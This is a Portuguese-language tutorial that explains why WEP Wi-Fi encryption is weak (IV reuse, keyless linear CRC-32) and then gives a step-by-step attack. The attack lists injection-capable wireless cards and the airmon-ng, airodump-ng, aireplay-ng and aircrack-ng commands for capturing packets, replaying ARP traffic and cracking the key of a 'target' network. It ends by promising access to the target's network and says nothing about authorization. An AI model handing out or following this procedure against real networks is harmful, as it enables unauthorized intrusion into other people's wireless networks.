Mas porque redes com criptografia WEP são tão vulneráveis?

Após vários estudos e testes realizados com este protocolo, encontraram-se algumas vulnerabilidades e falhas que fizeram com que o WEP perdesse quase toda a sua credibilidade.

No WEP, os dois parâmetros que servem de entrada para o algoritmo RC4 são a chave secreta k de 40 bits ou 104 bits e um vector de inicialização de 24 bits. A partir desses dois parâmetros, o algoritmo gera uma seqüência criptografada RC4 (k,v).

Porém, como no WEP a chave secreta que é a mesma utilizada por todos os usuários de uma mesma rede, onde devemos ter um vetor de inicialização diferente para cada pacote a fim de evitar a repetição de uma mesma seqüência RC4 . Essa repetição de seqüência é extremamente indesejável pois dá margem a ataques bem sucedidos e conseqüente descoberta de pacotes por eventuais intrusos.

Além disso, há também uma forte recomendação para que seja feita a troca das chaves secretas periodicamente aumentando-se com isso a segurança da rede. Porém, essa troca quando é feita, é realizada manualmente de maneira pouco prática e por vezes inviável, quando se trata de redes com um número muito alto de usuários.

E ainda uma falha do WEP constatada e provada através de ataques bem sucedidos é a natureza de sua função detectora de erros. A CRC-32 é uma função linear e que não possui chave. Essas duas características tornam o protocolo suscetível a dois tipos de ataques prejudiciais e indesejáveis: é possível fazer uma modificação de mensagens que eventualmente tenham sido capturadas no meio do caminho sem que isso seja descoberto pelo receptor final devido a linearidade da função detectora de erros(MITM Man The Of Middle - O homem do meio), e além disso, pelo fato da função não possuir uma chave, é também possível descobrir uma seqüência secreta RC4 e de posse desta ser autenticado na rede e introduzir mensagens clandestinas nesta (Injeção de Pacotes).

Requerimentos:

1-BackTrack 4 final Live DVD em:
http://www.backtrack.com.br/iso/11012010/bt4-final.iso

2-Drive de DVD ou Pendrive
3- Um placa de rede wireless com injeção de pacotes, que sejam suportadas pelo Backtrack 4, como abaixo:

Lista de Placas de Rede Wireless Testadas e Homologadas:
1. Testadas
1.1 PCI
1.1.1 Asus WL-138g v2
1.1.2 Belkin F5D8001
1.1.3 CNet CWP-854
1.1.4 Dlink DWA-520
1.1.5 Dlink DWA-552
1.1.6 Dlink DWL-AG530
1.1.7 Dlink DWL-G520
1.1.8 Dlink DWL-G550
1.1.9 Dlink DWL-G510
1.1.10 Dynex DX-EBDTC
1.1.11 Foxconn WLL-3350
1.1.12 MSI PC60G
1.1.13 Netgear WG311T
1.1.14 Netgear WPN311
1.1.15 SMC SMCWPCI-G
2.2 Mini PCI (Built in)
2.2.1 Broadcom BCM4306 802.11b/g (rev 3)
2.2.2 Broadcom BCM4318 802.11b/g
2.2.3 IBM AR5212 802.11abg NIC (rev 01)
2.2.4 IPW2100
2.2.5 IPW2200
2.2.6 WN360G
1.3 Mini PCIe (Built in)
1.3.1 Broadcom BCM4311 802.11b/g
1.3.2 IPW3945
1.3.3 IPWRAW (IPW3945 Monitor + Inject)
1.3.4 IPW4965/IWL4965 agn
1.3.5 Gigabyte GN-WS50G b/g
1.4 PCMCIA Cards
1.4.1 3COM 3CRWE154G72 v1
1.4.2 3COM 3CRPAG175B with XJACK Antenna
1.4.3 Agere Systems ORiNOCO GOLD PC Card Classic
1.4.4 AirLink101 AWLC4130
1.4.5 ASUS WL100G
1.4.6 Belkin F5D6020 v3
1.4.7 Belkin F5D7010 V1000
1.4.8 Belkin F5D7010 V3000UK
1.4.9 Belkin F5D7010 V5000
1.4.10 Belkin F5D7010 V6000
1.4.11 Belkin F5D7011
1.4.12 Buffalo WLI-CB-G54HP
1.4.13 Cisco AIR-LMC350
1.4.14 Cisco AIR-PCM350-T
1.4.15 Cisco Aironet AIR-CB21AG-A-K9
1.4.16 Dlink DWA-645
1.4.17 Dlink DWL-650+
1.4.18 Dlink DWL-G650
1.4.19 Dlink DWL-G630, 650+/-
1.4.20 Dlink DWL-G650M
1.4.21 D-Link WNA-1330
1.4.22 Enterasys Roamabout 802.11 DS High Rate
1.4.23 Gigabyte GN-WM01GT AirCruiserG Mach G
1.4.24 Lucent Technologies Orinoco Silver
1.4.25 Linksys WPC11v4
1.4.26 Linksys WPC54G v3
1.4.27 Motorola WN825G v2
1.4.28 NetGear MA401
1.4.29 NetGear WPN511
1.4.30 NetGear WPN511 - Range Max
1.4.31 NetGear WG511T
1.4.32 NetGear WAG511v2
1.4.33 NetGear WG511 v1
1.4.34 NetGear WG511 v2
1.4.35 NetGear WG511 v3
1.4.36 NetGear WG511v2
1.4.37 Netgear WG511U
1.4.38 NetGear WPN511GR
1.4.39 Netgear WPNT511
1.4.40 PROXIM ORiNOCO 802.11b/g Gold (Model: 8470-WD)
1.4.41 Senao NL-2511CD/SL-2511CD PLUS EXT2
1.4.42 Sitecom WL-100b
1.4.43 SMC 2532W-B
1.4.44 SMC SMC2536W-AG
1.4.45 SMC WCB-G
1.4.46 SWEEX LW051 ver:1.0
1.4.47 TP-link SuperG&eXtended Range 108M Wireless Cardbus Adapter(TL-WN610G)
1.4.48 TP-link eXtended Range 54M Wireless Cardbus Adapter (TL-WN510G)
1.4.49 Ubiquiti SRC
1.4.50 Wistron WLAN 802.11a/b/g Cardbus CB9-GP
1.4.51 X-Micro WLAN 11g PCMCIA Card (XWL-11GPAG)
1.4.52 ZCom XI-325HP+
1.4.53 Zyxel ZyAIR G-100 PCMCIA Card (FCC ID:N89-WE601l)
1.5 USB Dongles
1.5.1 Airlink101 AWLL3026
1.5.2 ALFA Networks AWUS036E
1.5.3 ALFA Networks AWUS036H
1.5.4 ALFA Networks AWUS036S
1.5.5 ASUS WL-167G
1.5.6 AVM Fritz!Wlan USB V1.1
1.5.7 Belkin F5D7050 V1
1.5.8 Belkin F5D7050 (4000 series)
1.5.9 Belkin F5D7050B
1.5.10 Belkin F5D7050E
1.5.11 Belkin F5D7051
1.5.12 Buffalo Airstation G54 WLI-U2-KG54-AI (2A)
1.5.13 Chiefmax
1.5.14 D-Link DWL 122 (USB) F/W 3.2.1 H/W A1
1.5.15 D-Link DWL G122 (USB) F/W 2.03 B1
1.5.16 D-Link WUA-1340
1.5.17 Edimax EW-7317UG
1.5.18 Edimax EW-7318USG
1.5.19 Hawking HWUG1
1.5.20 Hawking HWU8DD
1.5.21 Linksys WUSB54g v4
1.5.22 Linksys WUSB54GC
1.5.23 Linksys WUSB600N
1.5.24 MicroEdge MEG55A Wireless-G USB Dongle
1.5.25 NetGear MA111
1.5.26 NetGear WG111v2
1.5.27 NetGear WG111T
1.5.28 Netopia ter/gusb-e
1.5.29 OvisLink Evo-w54usb
1.5.30 Rosewill RNX-G1(W)
1.5.31 SafeCom SWMULZ-5400
1.5.32 TP-Link TL-WN321G
1.5.33 USB WiFi Booster Kit with 5dbi Indoor Dipole
1.5.34 ZyDAS 1211
1.5.35 SMCWUSB-G EU
1.5.36 MSI US54SE


Passo a Passo:

Instruções que são colocados dentro de aspas e com MAIUSCULAS exigem que você substitua com dados reais

1. Faça o Download do BackTrack 4 e grave em DVD

2. Dê Boot com BackTrack 4 e inicie a GUI digitando “startx”

3. Abra um “Konsole” e digite “airmon-ng”, lembre-se da sua interface de rede wireless (geralmente wlan0)

4. Digite “airodump-ng INTERFACE”

5. Será mostrado abaixo seu BSSID, ESSID, e channel da rede alvo.

6. Digite “airodump-ng -w wep -c CHANNEL –bssid BSSID INTERFACE”

7. Abra um novo console “Konsole” e digite "aireplay-ng -1 0 -a BSSID INTERFACE”

8. Abra um novo console “Konsole” e digite "aireplay-ng -3 -b BSSID INTERFACE”

9. Aguarde até as informações chegarem próximo (mais ou menos) até 30000.

10. Digite “aircrack-ng wep-01.cap INTERFACE”

Você terá conseguido o acesso a rede do seu alvo.